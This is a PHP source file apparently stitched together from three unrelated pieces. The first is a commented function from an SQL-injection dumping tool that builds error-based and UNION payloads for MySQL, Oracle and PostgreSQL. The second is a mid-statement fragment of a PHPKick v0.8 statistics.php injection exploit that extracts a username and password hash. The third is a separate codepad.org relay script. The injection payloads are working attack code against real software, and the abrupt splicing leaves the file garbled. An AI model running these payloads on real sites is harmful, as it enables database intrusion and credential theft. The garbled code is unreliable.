/**
 * Renders one HTML table per selected column with the values retrieved for it.
 *
 * Input comes from $_POST ('datos', 'url', 'lol', 'sobras', 'nombre', 'database',
 * 'tn') and from the globals $a..$d (indexed request templates, one list per
 * 'datos' mode) and $payload_* (the placeholder text swapped out by str_replace).
 * Output is written straight to the response; nothing is returned.
 *
 * html_header(), asciiEncode(), get_url() and GetBetween() are not defined in
 * this fragment. Note that GetBetween() is called here with a single argument,
 * unlike the three-argument GetBetween() that appears elsewhere on this page,
 * so it is presumably a different helper.
 *
 * Detection note: every request this function sends carries fixed, URL-encoded
 * fragments (INFORMATION_SCHEMA.CHARACTER_SETS, floor(rand(0)*2) ... GROUP BY,
 * REPLACE(...CHR(58)||CHR(121)...), and the hex markers 0x3a6f79753a /
 * 0x3a70687a3a — ":oyu:" / ":phz:" — that frame each extracted value). Those
 * strings are stable keys for WAF rules and access-log searches on the
 * receiving side.
 */
function frame6() {
    html_header();
    // $string3, $action and $detectar_t are imported but never read here.
    global $string3;
    global $action, $detectar_t;
    global $a, $payload_error, $b, $payload_union, $c, $payload_oracle, $d, $payload_postgre;
    if (isset($_POST['datos'])) {
        // Every field is used as-is; nothing validates or escapes them.
        $url = $_POST["url"];
        $vuln_index = $_POST["lol"];
        $sobras = $_POST['sobras'];
        // Overwritten in the row loop below; this initial value is never read.
        $nombre = $_POST['nombre'];
        $database = $_POST['database'];
        $tabla = $_POST['tn'];
        // Only the array form of 'nombre' is handled; a scalar produces no output.
        if (is_array($_POST['nombre']) == true) {
            foreach ($_POST['nombre'] as $nombres) {
                // NOTE: a <table> is opened for every column, but "</tr></table>"
                // is echoed only once after the loop, so the markup is unbalanced.
                echo "<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"display: inline-block;vertical-align: top;\"><tr>";
                echo "<td>" . asciiEncode($nombres) . "</td>";
                // Pick the template for the selected mode ('lol' is 1-based) and build
                // $querys, the first request, which asks for the row count of the table.
                // $mode stays undefined when 'datos' matches none of the four values;
                // the second chain below then skips every branch and $i, $count and
                // $queryn are all left unset.
                if ($_POST['datos'] == 'data e-b') {
                    $mode = "mysql_error";
                    $query = $a[$vuln_index - 1];
                    $querys = str_replace("{$payload_error}", "(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20" . asciiEncode($database) . "." . $tabla . "),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)", $query);
                } elseif ($_POST['datos'] == 'data u-q') {
                    $mode = "mysql_union";
                    $query = $b[$vuln_index - 1];
                    $querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);
                    // Splices the FROM clause in front of every encoded '#' (%23) in the template.
                    $querys = str_replace("%23", "%20FROM%20" . asciiEncode($database) . "." . $tabla . "%23", $querys);
                } elseif ($_POST['datos'] == 'data o-eb') {
                    $mode = "oracle_error";
                    $query = $c[$vuln_index - 1];
                    // $database and $tabla are concatenated raw here (no asciiEncode), unlike the MySQL branches.
                    $querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(" . asciiEncode($nombres) . ")%20FROM%20" . $database . "." . $tabla . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query);
                } elseif ($_POST['datos'] == 'data pg') {
                    $mode = "postgre_error";
                    $query = $d[$vuln_index - 1];
                    // Always targets the 'public' schema; $database is ignored in this branch.
                    $querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public." . $tabla . ")", $query);
                }
                // Build $queryn, the per-row template. The literal text '$i' inside the
                // single-quoted strings is NOT interpolated; it is a placeholder that the
                // loop below fills via str_replace('$i', ...). Then send the count request.
                // $count is whatever GetBetween() extracts from the response, coerced to a
                // number by the subtraction (in PHP 8 a non-numeric string here throws a
                // TypeError; older versions silently yield -1).
                if ($mode == "mysql_error") {
                    $queryn = str_replace("{$payload_error}", '(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20)),1,50)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "mysql_union") {
                    $queryn = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "oracle_error") {
                    $queryn = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(' . asciiEncode($nombres) . '%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20' . asciiEncode($nombres) . '%2CROWNUM%20AS%20LIMIT%20FROM%20' . $database . '.' . $tabla . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "postgre_error") {
                    $queryn = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(' . asciiEncode($nombres) . '%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.' . $tabla . '%20OFFSET%20$i%20LIMIT%201)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                }
                echo "</tr>";
                // One request per row (0..$count inclusive). Each reply is echoed into
                // the HTML unescaped, so the page reflects whatever the remote server
                // returned.
                while ($i <= $count) {
                    $query_nombre = str_replace('$i', "{$i}", $queryn);
                    $nombre = GetBetween(get_url($url . $query_nombre . $sobras));
                    echo "<tr><td>" . $nombre . "</td>";
                    $i++;
                }
            }
            echo "</tr></table>";
        }
    }
}
$spos = strpos($host, "http://"); if (!is_int($spos) && $spos == 0) { $host = "http://{$host}"; } if (!$host == "http://localhost") { $spos = strpos($host, "http://www."); if (!is_int($spos) && $spos == 0) { $host = "http://www.{$host}"; } } $exploit = "statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f"; echo "exploiting...\n"; $source = file_get_contents($host . $path . $exploit); $username = GetBetween($source, " :<br>", ":"); echo "username: {$username}\n"; $hash = GetBetween($source, "<br>{$username}:", "</td>"); echo "hash: {$hash}\n"; } else { echo "\n\n"; echo "|=================PHPKick v0.8 statistics.php SQL Injection==================|\n"; echo "| |\n"; echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path] |\n"; echo "| |\n"; echo "|Example: php " . $_SERVER['argv'][0] . " http://www.domain.com /path/ |\n"; echo "| |\n"; echo "|Notes:This exploit works regardless of the PHP security settings |\n"; echo "| (magic_quotes, register_globals).This exploit is only for educational |\n"; echo "| use, use it on your own risk! Exploiting scripts without permission of|\n"; echo "| the owner of the webspace is illegal! |\n"; echo "| I'm not responsible for any resulting damage |\n"; echo "| |\n";
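<?php

declare(strict_types=1);

/*
 * Relays a snippet from the query string to codepad.org, runs it there and
 * echoes the program output codepad returns.
 *
 * Query parameters:
 *   code - source text to run; forwarded verbatim, so this script is an
 *          unauthenticated relay of untrusted input to a third party
 *   lang - language key; must be one of the keys of CODEPAD_LANGUAGES
 */

/** Language keys accepted in ?lang= mapped to the names codepad expects. */
const CODEPAD_LANGUAGES = [
    'c' => 'C',
    'c++' => 'C++',
    'd' => 'D',
    'haskell' => 'Haskell',
    'lua' => 'Lua',
    'ocaml' => 'OCaml',
    'php' => 'PHP',
    'perl' => 'Perl',
    'python' => 'Python',
    'ruby' => 'Ruby',
    'scheme' => 'Scheme',
    'tcl' => 'Tcl',
    '2' => 'C++',
];

/** Submission endpoint. Plain http: the snippet travels unencrypted. */
const CODEPAD_URL = 'http://codepad.org';

/** Seconds to wait for codepad before giving up (original had no limit). */
const CODEPAD_TIMEOUT = 15;

/**
 * Returns the part of $pool between the first occurrence of $var1 and the
 * next occurrence of $var2 after it.
 *
 * Returns '' when $var1 does not occur. When $var2 does not occur after
 * $var1, everything after $var1 is returned (as the original did). Unlike the
 * original, a $var2 that immediately follows $var1 yields '' instead of the
 * rest of the string, and a missing $var1 no longer produces an offset of
 * strlen($var1) into the pool.
 */
function GetBetween(string $var1, string $var2, string $pool): string
{
    $start = strpos($pool, $var1);
    if ($start === false) {
        return '';
    }
    $start += strlen($var1);

    // Search only after the opening delimiter; the original searched the
    // remainder too but compared the result with == 0, which also caught false.
    $end = strpos($pool, $var2, $start);
    if ($end === false) {
        return substr($pool, $start);
    }

    return substr($pool, $start, $end - $start);
}

/**
 * Validates the request, submits the snippet and prints codepad's output.
 *
 * @param array<string, mixed> $query the request's query parameters ($_GET)
 */
function runCodepad(array $query): void
{
    $code = $query['code'] ?? null;
    $lang = $query['lang'] ?? null;
    if (!is_string($code) || !is_string($lang)) {
        http_response_code(400);
        echo "Missing 'code' or 'lang' parameter.";
        return;
    }

    // Unknown keys used to trigger an undefined-index notice and a null lang.
    $langName = CODEPAD_LANGUAGES[strtolower($lang)] ?? null;
    if ($langName === null) {
        http_response_code(400);
        echo 'Unsupported language: ' . htmlspecialchars($lang, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        return;
    }

    // Form fields are sent exactly as the original did (including the
    // 'privite' key), since codepad's form is the contract here.
    $form = [
        'code' => $code,
        'lang' => $langName,
        'submit' => 'Submit',
        'run' => "True",
        'privite' => "True",
    ];

    // The wrapper key is 'http' even for https:// targets.
    $context = stream_context_create([
        'http' => [
            'header' => "Content-type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($form),
            'timeout' => CODEPAD_TIMEOUT,
        ],
    ]);

    $result = file_get_contents(CODEPAD_URL, false, $context);
    if ($result === false) {
        // The original passed false on to GetBetween() and printed garbage.
        http_response_code(502);
        echo 'No response from codepad.org.';
        return;
    }

    $output = GetBetween('<a name="output">', '</td></tr></tbody></table>', $result);
    // strip_tags() only drops tags; it is not a context-aware escaper. Kept as
    // the original's output filter so rendering is unchanged — if this page is
    // served as HTML, escaping for that context would be the safer choice.
    echo strip_tags(GetBetween('<td width="100%" style="vertical-align: top">', '</td>', $output));
}

runCodepad($_GET);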